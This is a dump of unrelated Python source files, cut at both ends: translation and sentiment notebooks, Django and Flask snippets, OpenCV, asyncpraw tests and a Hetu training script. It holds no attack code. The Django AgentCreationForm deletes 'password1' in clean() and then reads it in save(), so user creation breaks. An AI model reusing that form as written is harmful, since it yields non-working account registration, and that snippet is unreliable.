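# For example, case_naming(12, namebase='test') gives ['test_00', 'test_01', ..., 'test_11'];
# the zero-padding width is taken from the largest case index.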
def convert_str(val):
def try_type(val, data_type):
try:
data_type(val)
return True
except:
return False
# return isinstance(val, data_type) ### this doesn't work b/c of numpy data types; they're not instances of base types
def try_list(val):
try:
val[0]
return True
except:
return False
if try_type(val, int) and int(val) == float(val):
return int(val)
elif try_type(val, float):
return float(val)
elif val=='True':
return True
elif val=='False':
return False
# elif type(val)!=str and try_list(val):
# return ", ".join(['{:}'.format(i) for i in val])
else:
return val
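# convert_str restores native types from the string-valued case matrix, e.g.
# '1' -> 1, '2.5' -> 2.5, 'True' -> True; any other string is returned unchanged.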
def CaseGen_General(case_inputs, dir_matrix='', namebase='', save_matrix=True):
""" Cartesian product to enumerate over all combinations of set of variables that are changed together"""
# put case dict into lists
change_vars = sorted(case_inputs.keys())
change_vals = [case_inputs[var]['vals'] for var in change_vars]
change_group = [case_inputs[var]['group'] for var in change_vars]
# find number of groups and length of groups
group_set = list(set(change_group))
group_len = [len(change_vals[change_group.index(i)]) for i in group_set]
# case matrix, as indices
group_idx = [range(n) for n in group_len]
matrix_idx = list(itertools.product(*group_idx))
# index of each group
matrix_group_idx = [np.where([group_i == group_j for group_j in change_group])[0].tolist() for group_i in group_set]
# build final matrix of variable values
matrix_out = []
for i, row in enumerate(matrix_idx):
row_out = [None]*len(change_vars)
for j, val in enumerate(row):
for g in matrix_group_idx[j]:
row_out[g] = change_vals[g][val]
matrix_out.append(row_out)
try:
matrix_out = np.asarray(matrix_out, dtype=str)
except:
matrix_out = np.asarray(matrix_out)
n_cases = np.shape(matrix_out)[0]
# case naming
case_name = case_naming(n_cases, namebase=namebase)
# Save case matrix
if save_matrix:
if not dir_matrix:
dir_matrix = os.getcwd()
try:
save_case_matrix(matrix_out, change_vars, dir_matrix)
save_case_matrix_yaml(matrix_out, change_vars, dir_matrix, case_name)
except:
save_case_matrix_yaml(matrix_out, change_vars, dir_matrix, case_name)
case_list = []
for i in range(n_cases):
case_list_i = {}
for j, var in enumerate(change_vars):
case_list_i[var] = convert_str(matrix_out[i,j])
case_list.append(case_list_i)
return case_list, case_name
if __name__ == "__main__":
case_inputs = {}
case_inputs[("Fst","TMax")] = {'vals':[10.], 'group':0}
case_inputs[("InflowWind","WindType")] = {'vals':[1], 'group':0}
case_inputs[("InflowWind","HWindSpeed")] = {'vals':[8., 9., 10., 11., 12.], 'group':1}
case_inputs[("ElastoDyn","RotSpeed")] = {'vals':[9.156, 10.296, 11.431, 11.89, 12.1], 'group':1}
case_inputs[("ElastoDyn","BlPitch1")] = {'vals':[0., 0., 0., 0., 3.823], 'group':1}
case_inputs[("ElastoDyn","BlPitch2")] = case_inputs[("ElastoDyn","BlPitch1")]
case_inputs[("ElastoDyn","BlPitch3")] = case_inputs[("ElastoDyn","BlPitch1")]
case_inputs[("ElastoDyn","GenDOF")] = {'vals':['True','False'], 'group':2}
case_list, case_name = CaseGen_General(case_inputs, 'C:/Users/egaertne/WISDEM/AeroelasticSE/src/AeroelasticSE/', 'testing')
|
py | 1a4a1dcca2941cb9cd9a11655b13374007d942c6 | #
# Credit for the open-source translation models used in this notebook goes to the members of the
# OPUS-MT and Helsinki-NLP teams, as well as contributors to Microsoft's Marian-NMT, in particular
# Jörg Tiedemann at the University of Helsinki and Marcin Junczys-Dowmunt at Microsoft Translation
#
# Inspiration for the sentiment models used in this notebook comes from Chris McCormick and
# Nick Ryan's BERT fine-tuning tutorial, located here: https://mccormickml.com/2019/07/22/BERT-fine-tuning/
#
# Our main contribution as the authors of this notebook and members of the associated project (anonymized
# for purposes of peer-review) is in incorporating the sentiment models described above (BERT/XLM-RoBERTa) directly
# into the process of selecting translation candidates generated by beam search, supported by the open-source
# translation models also described above
#
# Some comments——such as those giving credit to the contributors listed above——may not be our own, and
# should be credited to Chris McCormick, Nick Ryan, and various members of the OPUS-MT, Helsinki-NLP, and
# Marian-NMT teams
###########################################################################################################
# -*- coding: utf-8 -*-
"""MarianMT en-ROMANCE Model with sentiment-based modification
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1EBQTIVCwTXP7bBOjm0493pkGu_1FcNln
"""
# Commented out IPython magic to ensure Python compatibility.
# %%capture
# !pip install transformers --upgrade
# !pip install mosestokenizer
"""### Translating with Transformers
Thanks to everyone who helped with this, especially:
* [Jörg Tiedemann](https://researchportal.helsinki.fi/en/persons/j%C3%B6rg-tiedemann) from the [OPUS project](http://opus.nlpl.eu/)
* [Marcin Junczys-Dowmunt](https://twitter.com/marian_nmt) from Microsoft's [Marian NMT](https://t.co/IuL994N6nQ?amp=1) library
"""
# Commented out IPython magic to ensure Python compatibility.
# %%capture
# from transformers import MarianMTModel, MarianTokenizer
# src_text = [
# '>>fr<< This is a sentence in english that we want to translate to french.',
# '>>pt<< This should go to portuguese.',
# '>>es<< And this to Spanish.'
# ]
#
# model_name = 'Helsinki-NLP/opus-mt-en-ROMANCE'
# tokenizer = MarianTokenizer.from_pretrained(model_name)
# # see tokenizer.supported_language_codes for choices
# model = MarianMTModel.from_pretrained(model_name)
#@title Translate with Transformers
english_text = "Time Warner Road Runner customer support here absolutely blows." #@param {type:"string"}
tgt_language = "es" #@param ["fr", "es", "it", "pt", "pt_br", "ro", "ca", "gl", "pt_BR", "la", "wa", "fur", "oc", "fr_CA", "sc", "es_ES", "es_MX", "es_AR", "es_PR", "es_UY", "es_CL", "es_CO", "es_CR", "es_GT", "es_HN", "es_NI", "es_PA", "es_PE", "es_VE", "es_DO", "es_EC", "es_SV", "an", "pt_PT", "frp", "lad", "vec", "fr_FR", "co", "it_IT", "lld", "lij", "lmo", "nap", "rm", "scn", "mwl"] {allow-input: true}
src_txt = f'>>{tgt_language}<< {english_text}'
translated = model.generate(**tokenizer.prepare_translation_batch([src_txt]), num_beams=10, num_return_sequences=10)
print([tokenizer.decode(t, skip_special_tokens=True) for t in translated])
import torch
from google.colab import drive
drive.mount("/content/drive")
!pip install transformers
from transformers import BertForSequenceClassification
english_sentiment_model = BertForSequenceClassification.from_pretrained(
"bert-base-uncased", # Use the 12-layer BERT model, with an uncased vocab.
num_labels = 2, # The number of output labels--2 for binary classification.
# You can increase this for multi-class tasks.
output_attentions = False, # Whether the model returns attentions weights.
output_hidden_states = False # Whether the model returns all hidden-states.
)
from transformers import XLMRobertaForSequenceClassification, AdamW, BertConfig
# Load BertForSequenceClassification, the pretrained BERT model with a single
# linear classification layer on top.
spanish_sentiment_model = XLMRobertaForSequenceClassification.from_pretrained(
"xlm-roberta-large", # Use the large XLM Roberta model.
num_labels = 2, # The number of output labels--2 for binary classification, 3 for ternary, etc.
# You can increase this for multi-class tasks.
output_attentions = False, # Whether the model returns attentions weights.
output_hidden_states = False, # Whether the model returns all hidden-states.
)
english_sentiment_model.load_state_dict(torch.load("/content/drive/My Drive/Summer Project 2020/English_sentiment_model.pt", map_location=torch.device('cpu')))
english_sentiment_model.eval()
spanish_sentiment_model.load_state_dict(torch.load("/content/drive/My Drive/Summer Project 2020/Spanish_sentiment_model.pt", map_location=torch.device('cpu')))
spanish_sentiment_model.eval()
from transformers import BertTokenizer, XLMRobertaTokenizer
from torch.utils.data import TensorDataset, DataLoader
import numpy as np
import re
from bs4 import BeautifulSoup
# gets the tweet into the format we want
def clean_tweet(tweet):
tweet = BeautifulSoup(tweet, "lxml").get_text() # turns xml-formatted text into regular text
tweet = re.sub(r"@[A-Za-z0-9]+", " ", tweet) # gets rid of all user references in tweets (i.e. "@username")
tweet = re.sub(r"https?://[A-Za-z0-9./]+", " ", tweet) # gets rid of URLs
tweet = re.sub(r"[^A-Za-z.!?áéíóúüñ¿ÁÉÍÓÚÜÑ']", " ", tweet) # gets rid of any non-standard characters in the tweets
tweet = re.sub(r" +", " ", tweet) # replaces all excess whitespace with a single space
return tweet # gives us our cleaned tweet
english_sentiment_tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', do_lower_case=True)
spanish_sentiment_tokenizer = XLMRobertaTokenizer.from_pretrained('xlm-roberta-large', do_lower_case=True)
device = torch.device('cpu')
def predict_sentiment(tweet, language):
if language == "english":
sentiment_model = english_sentiment_model
sentiment_tokenizer = english_sentiment_tokenizer
if language == "spanish":
sentiment_tokenizer = spanish_sentiment_tokenizer
sentiment_model = spanish_sentiment_model
tweet = clean_tweet(tweet)
tweet_input_id = []
tweet_attention_mask = []
tweet_dict = sentiment_tokenizer.encode_plus(
tweet, # Sentence to encode.
add_special_tokens = True, # Add '[CLS]' and '[SEP]'
max_length = 64, # Pad & truncate all sentences.
truncation=True, # Explicitly enable truncation
pad_to_max_length = True,
return_attention_mask = True, # Construct attn. masks.
return_tensors = 'pt', # Return pytorch tensors.
)
# Add the encoded sentence to the list.
tweet_input_id.append(tweet_dict['input_ids'])
# And its attention mask (simply differentiates padding from non-padding).
tweet_attention_mask.append(tweet_dict['attention_mask'])
# Convert the lists into tensors.
tweet_input_id = torch.cat(tweet_input_id, dim=0)
tweet_attention_mask = torch.cat(tweet_attention_mask, dim=0)
tweet_data = TensorDataset(tweet_input_id, tweet_attention_mask)
tweet_dataloader = DataLoader(tweet_data)
for data in tweet_dataloader:
tweet_input_id = data[0].to(device)
tweet_attention_mask = data[1].to(device)
tweet_logits = sentiment_model(tweet_input_id, token_type_ids=None, attention_mask=tweet_attention_mask)
tweet_logits = tweet_logits[0].detach().cpu().numpy()
tweet_logits = torch.Tensor(tweet_logits)
softmax = torch.nn.Softmax(dim=1)
prob_dist = softmax(tweet_logits)
sentiment_pred = prob_dist.tolist()
sentiment_pred = sentiment_pred[0][1]
return sentiment_pred
print(predict_sentiment("This is the best day ever!", "english"))
print(predict_sentiment("Este es el peor dia de mi vida", "spanish"))
# OUR NOVEL CONTRIBUTION TO THE NMT CANDIDATE SELECTION PROCESS:
# Select, from the top num_candidates translations, the translation
# which minimizes the absolute difference between the translation's sentiment
# and that of the source text
def TranslateWithSentimentSelection(sentence, num_candidates):
source_sentence = f'>>{"es"}<< {sentence}'
translated = model.generate(**tokenizer.prepare_translation_batch([source_sentence]), num_beams=num_candidates, num_return_sequences=num_candidates)
candidate_translations = [tokenizer.decode(t, skip_special_tokens=True) for t in translated]
source_sentiment = predict_sentiment(sentence, "english")
target_sentiments = [predict_sentiment(candidate, "spanish") for candidate in candidate_translations]
sentiment_divergence_list = []
for i in range(len(target_sentiments)):
sentiment_divergence_list.append(abs(target_sentiments[i] - source_sentiment))
translation = candidate_translations[sentiment_divergence_list.index(min(sentiment_divergence_list))]
return translation
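# Note: the sentiment-based selection above only re-ranks the num_candidates sequences that beam
# search already produced; if several candidates tie on sentiment divergence, index() keeps the
# first of them, i.e. the one ranked highest by beam score.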
# FOR GENERATING THE BASELINE TRANSLATION, I.E. BEST CANDIDATE AS DETERMINED BY
# BEAM SEARCH
def TranslateBaseline(sentence):
source_sentence = f'>>{"es"}<< {sentence}'
translated = model.generate(**tokenizer.prepare_translation_batch([source_sentence]))
translation = ([tokenizer.decode(t, skip_special_tokens=True) for t in translated])[0]
return translation
# Testing our modified model against the baseline
example_sentence_1 = "Time Warner Road Runner customer support here absolutely blows."
print("English sentence 1:", example_sentence_1)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_1))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_1, 10))
print(" ")
print(" ")
example_sentence_2 = "Okay, first assessment of the Kindle . . . it fucking rocks!"
print("English sentence 2:", example_sentence_2)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_2))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_2, 10))
print(" ")
print(" ")
example_sentence_3 = "Could Time Warner Cable suck more?"
print("English sentence 3:", example_sentence_3)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_3))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_3, 10))
example_sentence_4 = "LeBron is a monsta and he is only 24. SMH The world ain't ready."
print("English sentence 4:", example_sentence_4)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_4))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_4, 10))
print(" ")
print(" ")
example_sentence_5 = "I know my life has been flipped upside down when I just thought in my head that some Ramen sounds good. "
print("English sentence 5:", example_sentence_5)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_5))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_5, 10))
print(" ")
print(" ")
example_sentence_6 = "I'm sorry—I'm feeling kinda yucky myself—5am is going to come too quick."
print("English sentence 6:", example_sentence_6)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_6))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_6, 10))
print(" ")
print(" ")
example_sentence_7 = "I need a new boyfriend... I'm stuck in a rut"
print("English sentence 7:", example_sentence_7)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_7))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_7, 10))
print(" ")
print(" ")
example_sentence_8 = "aww that stinks!"
print("English sentence 8:", example_sentence_8)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_8))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_8, 10))
print(" ")
print(" ")
example_sentence_9 = "I'm tired. I feel like crap. And the world feels all crummy. Make me happy, USB disco mouse. "
print("English sentence 9:", example_sentence_9)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_9))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_9, 10))
print(" ")
print(" ")
example_sentence_10 = "why are people such wankers these days?"
print("English sentence 10:", example_sentence_10)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_10))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_10, 10))
print(" ")
print(" ")
example_sentence_11 = "@Holidaybot is rubbish! . . ."
print("English sentence 11:", example_sentence_11)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_11))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_11, 10))
print(" ")
print(" ")
example_sentence_12 = "@apple Contact sync between Yosemite and iOS8 is seriously screwed up. It used to be much more stable in the past"
print("English sentence 12:", example_sentence_12)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_12))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_12, 10))
print(" ")
print(" ")
example_sentence_13 = "Can't stand those ppl with @Apple stickers everywhere."
print("English sentence 13:", example_sentence_13)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_13))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_13, 10))
print(" ")
print(" ")
example_sentence_14 = "As a die hard @Apple customer, I must say I am truly displeased with the customer service I was given today."
print("English sentence 14:", example_sentence_14)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_14))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_14, 10))
print(" ")
print(" ")
example_sentence_15 = "Just broke my 3rd charger of the month. Get your shit together @apple"
print("English sentence 15:", example_sentence_15)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_15))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_15, 10))
print(" ")
print(" ")
example_sentence_16 = "Yo @Apple fix your shitty iMessage"
print("English sentence 16:", example_sentence_16)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_16))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_16, 10))
print(" ")
print(" ")
example_sentence_17 = "@apple please get yourself together! I need my products to work!"
print("English sentence 17:", example_sentence_17)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_17))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_17, 10))
print(" ")
print(" ")
example_sentence_18 = "@Apple the no caller ID thing is scary as heck and I suggest you stop it"
print("English sentence 18:", example_sentence_18)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_18))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_18, 10))
print(" ")
print(" ")
example_sentence_19 = "@Apple tbh annoyed with Apple's shit at the moment"
print("English sentence 19:", example_sentence_19)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_19))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_19, 10))
example_sentence_20 = "Fair enough. But i have the Kindle2 and I think it's perfect :)"
print("English sentence 20:", example_sentence_20)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_20))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_20, 10))
print(" ")
print(" ")
example_sentence_21 = "how can you not love Obama? he makes jokes about himself."
print("English sentence 21:", example_sentence_21)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_21))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_21, 10))
print(" ")
print(" ")
example_sentence_22 = "Went to see the Star Trek movie last night. Very satisfying."
print("English sentence 22:", example_sentence_22)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_22))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_22, 10))
print(" ")
print(" ")
example_sentence_23 = "I hate the dentist....who invented them anyways?"
print("English sentence 23:", example_sentence_23)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_23))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_23, 10))
print(" ")
print(" ")
example_sentence_24 = "@ Safeway. Place is a nightmare right now. Bumming."
print("English sentence 24:", example_sentence_24)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_24))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_24, 10))
print(" ")
print(" ")
example_sentence_25 = "Reading the tweets coming out of Iran... The whole thing is terrifying and incredibly sad..."
print("English sentence 25:", example_sentence_25)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_25))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_25, 10))
print(" ")
print(" ")
example_sentence_26 = "with the boyfriend, eating a quesadilla"
print("English sentence 26:", example_sentence_26)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_26))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_26, 10))
print(" ")
print(" ")
example_sentence_27 = "Hate safeway select green tea icecream! bought two cartons, what a waste of money. "
print("English sentence 27:", example_sentence_27)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_27))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_27, 10))
print(" ")
print(" ")
example_sentence_28 = "I am furious with Time Warner and their phone promotions!"
print("English sentence 28:", example_sentence_28)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_28))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_28, 10))
print(" ")
print(" ")
example_sentence_29 = "is upset about the whole GM thing. life as i know it is so screwed up"
print("English sentence 29:", example_sentence_29)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_29))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_29, 10))
print(" ")
print(" ")
example_sentence_30 = "saw night at the museum out of sheer desperation. who is funding these movies?"
print("English sentence 30:", example_sentence_30)
print("-----------------------------------------------------------------------------------")
print("Baseline model translation:", TranslateBaseline(example_sentence_30))
print("Modified model translation:", TranslateWithSentimentSelection(example_sentence_30, 10))
|
py | 1a4a1e3a2252f639ea26cab83840cc3068e88dfa | from django import forms
from django.contrib.auth.models import User
from .models import Agent
class AgentForm(forms.ModelForm) :
    class Meta :
        model = Agent  # a ModelForm needs an explicit model; Agent is the model this form edits
        exclude = ('date_added', )
class AgentCreationForm(forms.Form) :
first_name = forms.CharField(label="First Name", required=True)
last_name = forms.CharField(label="Last Name", required=True)
password1 = forms.CharField(label="Password", required=True, widget=forms.PasswordInput, max_length=30)
password2 = forms.CharField(label="Password Confirm", required=True, widget=forms.PasswordInput, max_length=30)
email = forms.EmailField(label="Email address", required=True)
telephone = forms.IntegerField(label="Telephone", required=True)
description = forms.CharField(label="Description", required=True)
picture = forms.ImageField(label="Picture", required=True)
def clean(self):
form_data = self.cleaned_data
if form_data['password1'] != form_data.get('password2') :
self.add_error("password1", "Passwords must match")
self.add_error("password2", "Passwords must match")
del form_data['password1']
del form_data['password2']
return form_data
def save(self):
user = User.objects.create_user(
self.cleaned_data['email'],
email=self.cleaned_data['email'],
first_name=self.cleaned_data['first_name'],
last_name= self.cleaned_data['last_name']
)
user.set_password(self.cleaned_data['password1'])
user.save()
agent = Agent.objects.create(
user=user,
telephone=self.cleaned_data['telephone'],
description=self.cleaned_data['description'],
picture=self.cleaned_data['picture']
)
agent.save()
return agent
|
py | 1a4a1e67573717cac73a362fba05f32b02e65cfb |
from app import Application as app
HOST = "127.0.0.1"
PORT = 80
DEBUG = True
if __name__ == '__main__':
app.run(
host=HOST,
port=PORT,
debug=DEBUG
)
|
py | 1a4a1ea4587c388216855978c991074b8c03c453 | import csv
roberta=set(['100001', '100042', '100137', '100300', '100380', '100448', '100453', '100508', '100549', '100574', '100580', '100944', '100969', '100977', '100985', '101020', '101085', '101175', '101238', '101296', '101526', '101536', '101607', '101612', '101635', '101810', '101871', '101890', '101899', '101929', '101930', '101942', '102102', '102116', '102140', '102181', '102230', '102304', '102367', '102391', '102441', '102470', '102473', '102484', '102528', '102673', '102757', '102828', '102888', '102901', '102960'])
albert=set(['100000', '100001', '100191', '100409', '100448', '100508', '100549', '100574', '100624', '100921', '100944', '100969', '100977', '100985', '100998', '101085', '101099', '101175', '101238', '101296', '101417', '101429', '101439', '101488', '101519', '101557', '101567', '101586', '101612', '101630', '101638', '101769', '101805', '101834', '101846', '101890', '101929', '101930', '101942', '101990', '102074', '102102', '102103', '102116', '102181', '102304', '102391', '102441', '102470', '102474', '102522', '102545', '102673', '102757', '102828', '102889', '102901', '102936', '102949'])
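# Assumption (inferred from the variable names): each set above holds the dev-set example IDs that
# the named model predicted incorrectly, so the set algebra below gives the disagreement buckets.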
both_wrong=albert&roberta
albert_right_roberta_wrong=roberta-albert
roberta_right_albert_wrong=albert-roberta
with open("roberta_right_albert_wrong",'w') as rrawf,\
open("albert_right_roberta_wrong",'w')as arrwf, open("5a_both_wrong",'w') as bwf,\
open("/mnt/minerva1/nlp/projects/counterfactual/semeval/5/Subtask-1-master/dev.csv") as refs:
lines_ref=[row for row in csv.reader(refs)]
for ref in lines_ref:
if ref[0] in both_wrong:
bwf.write(','.join(ref)+'\n')
if ref[0] in roberta_right_albert_wrong:
rrawf.write(','.join(ref)+'\n')
if ref[0] in albert_right_roberta_wrong:
arrwf.write(','.join(ref)+'\n') |
py | 1a4a1efd37063b61c73e85a54c88c3fd63d56bab | # -*- coding: utf-8 -*-
from flask import Blueprint, g, request
transfer_mod = Blueprint('transfer', __name__, static_folder='static')
from . import views
@transfer_mod.before_request
def set_current_channel():
g.current_channel = 'transfer'
|
py | 1a4a1f7628c9c3ec06933d6940a15cab63cdd6d8 | import cv2
import numpy as np
def main():
x = cv2.imread("x.jpg")
y = cv2.imread("y.jpg")
print(x[300,500])
print(y[300,500])
print(x[300,500]+y[300,500])
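    # Note: the raw numpy addition above wraps around modulo 256 on uint8 pixels,
    # whereas cv2.add below saturates each channel at 255.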
toplam = cv2.add(x,y)
cv2.imshow("toplam",toplam)
agirlikli_toplam = cv2.addWeighted(x,0.3,y,0.7,0)
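    # cv2.addWeighted blends the images as 0.3*x + 0.7*y + 0, again saturating at 255.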
cv2.imshow("ağırlıklı toplam",agirlikli_toplam)
print("X FOTO\nyükseklik : {}\ngenişlik : {}\nkanal sayısı : {}\n ".format(x.shape[0],x.shape[1],x.shape[2]))
print("Y FOTO\nyükseklik : {}\ngenişlik : {}\nkanal sayısı : {}\n ".format(y.shape[0], y.shape[1], y.shape[2]))
cv2.imshow("x.jpg",x)
cv2.imshow("y.jpg",y)
cv2.waitKey(0)
cv2.destroyAllWindows()
if __name__ == "__main__":
main()
|
py | 1a4a21d86f73e4df4ca2e057a8ed9a1c9ea6f278 | """Test asyncpraw.models.user."""
from asynctest import mock
import pytest
from asyncpraw.exceptions import RedditAPIException
from asyncpraw.models import Multireddit, Redditor, Subreddit
from .. import IntegrationTest
class TestUser(IntegrationTest):
async def test_blocked(self):
self.reddit.read_only = False
with self.use_cassette():
blocked = await self.reddit.user.blocked()
assert len(blocked) > 0
assert all(isinstance(user, Redditor) for user in blocked)
async def test_contributor_subreddits(self):
self.reddit.read_only = False
with self.use_cassette():
count = 0
async for subreddit in self.reddit.user.contributor_subreddits():
assert isinstance(subreddit, Subreddit)
count += 1
assert count > 0
async def test_friends(self):
self.reddit.read_only = False
with self.use_cassette():
friends = await self.reddit.user.friends()
assert len(friends) > 0
assert all(isinstance(friend, Redditor) for friend in friends)
@mock.patch("asyncio.sleep", return_value=None)
async def test_friend_exist(self, _):
self.reddit.read_only = False
with self.use_cassette():
friend = await self.reddit.user.friends(user=await self.reddit.user.me())
assert isinstance(friend, Redditor)
@mock.patch("asyncio.sleep", return_value=None)
async def test_friend_not_exist(self, _):
self.reddit.read_only = False
with self.use_cassette():
with pytest.raises(RedditAPIException):
await self.reddit.user.friends(user="fake__user_user_user")
async def test_karma(self):
self.reddit.read_only = False
with self.use_cassette():
karma = await self.reddit.user.karma()
assert isinstance(karma, dict)
for subreddit in karma:
assert isinstance(subreddit, Subreddit)
keys = sorted(karma[subreddit].keys())
assert ["comment_karma", "link_karma"] == keys
async def test_me(self):
self.reddit.read_only = False
with self.use_cassette():
me = await self.reddit.user.me()
assert isinstance(me, Redditor)
me.praw_is_cached = True
me = await self.reddit.user.me()
assert me.praw_is_cached
@mock.patch("asyncio.sleep", return_value=None)
async def test_me__bypass_cache(self, _):
self.reddit.read_only = False
with self.use_cassette():
me = await self.reddit.user.me()
me.praw_is_cached = True
me = await self.reddit.user.me(use_cache=False)
assert not hasattr(me, "praw_is_cached")
async def test_multireddits(self):
self.reddit.read_only = False
with self.use_cassette():
multireddits = await self.reddit.user.multireddits()
assert isinstance(multireddits, list)
assert multireddits
assert all(isinstance(x, Multireddit) for x in multireddits)
async def test_subreddits(self):
self.reddit.read_only = False
with self.use_cassette():
count = 0
async for subreddit in self.reddit.user.subreddits():
assert isinstance(subreddit, Subreddit)
count += 1
assert count > 0
|
py | 1a4a224b12eb886e63027bd6382f82f3d37e933f | import hetu as ht
import models
import os
import numpy as np
import argparse
import json
import logging
from time import time
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
def print_rank0(msg):
if device_id == 0:
logger.info(msg)
if __name__ == "__main__":
# argument parser
parser = argparse.ArgumentParser()
parser.add_argument('--model', type=str, required=True,
help='model to be tested')
parser.add_argument('--dataset', type=str, required=True,
help='dataset to be trained on')
parser.add_argument('--batch-size', type=int,
default=128, help='batch size')
parser.add_argument('--learning-rate', type=float,
default=0.1, help='learning rate')
parser.add_argument('--opt', type=str, default='sgd',
help='optimizer to be used, default sgd; sgd / momentum / adagrad / adam')
parser.add_argument('--num-epochs', type=int,
default=10, help='epoch number')
parser.add_argument('--gpu', type=int, default=0,
help='gpu to be used, -1 means cpu')
parser.add_argument('--validate', action='store_true',
help='whether to use validation')
parser.add_argument('--timing', action='store_true',
help='whether to time the training phase')
parser.add_argument('--comm-mode', default=None, help='communication mode')
args = parser.parse_args()
global device_id
device_id = 0
print_rank0("Training {} on HETU".format(args.model))
if args.comm_mode in ('AllReduce', 'Hybrid'):
comm, device_id = ht.mpi_nccl_init()
executor_ctx = ht.gpu(device_id % 8) if args.gpu >= 0 else ht.cpu(0)
else:
if args.gpu == -1:
executor_ctx = ht.cpu(0)
print_rank0('Use CPU.')
else:
executor_ctx = ht.gpu(args.gpu)
print_rank0('Use GPU %d.' % args.gpu)
if args.comm_mode in ('PS', 'Hybrid'):
settings_file = open(os.path.join(os.path.abspath(
os.path.dirname(__file__)), 'worker_conf%d.json' % args.gpu))
settings = json.load(settings_file)
for key in settings:
if type(settings[key]) == str:
os.environ[key] = settings[key]
else:
                os.environ[key] = str(settings[key])  # environment values must be str
assert args.model in ['alexnet', 'cnn_3_layers', 'lenet', 'logreg', 'lstm', 'mlp', 'resnet18', 'resnet34', 'rnn', 'vgg16', 'vgg19'], \
'Model not supported!'
model = eval('models.' + args.model)
assert args.dataset in ['MNIST', 'CIFAR10', 'CIFAR100', 'ImageNet']
dataset = args.dataset
assert args.opt in ['sgd', 'momentum', 'nesterov',
'adagrad', 'adam'], 'Optimizer not supported!'
if args.opt == 'sgd':
print_rank0('Use SGD Optimizer.')
opt = ht.optim.SGDOptimizer(learning_rate=args.learning_rate)
elif args.opt == 'momentum':
print_rank0('Use Momentum Optimizer.')
opt = ht.optim.MomentumOptimizer(learning_rate=args.learning_rate)
elif args.opt == 'nesterov':
print_rank0('Use Nesterov Momentum Optimizer.')
opt = ht.optim.MomentumOptimizer(
learning_rate=args.learning_rate, nesterov=True)
elif args.opt == 'adagrad':
print_rank0('Use AdaGrad Optimizer.')
opt = ht.optim.AdaGradOptimizer(
learning_rate=args.learning_rate, initial_accumulator_value=0.1)
else:
print_rank0('Use Adam Optimizer.')
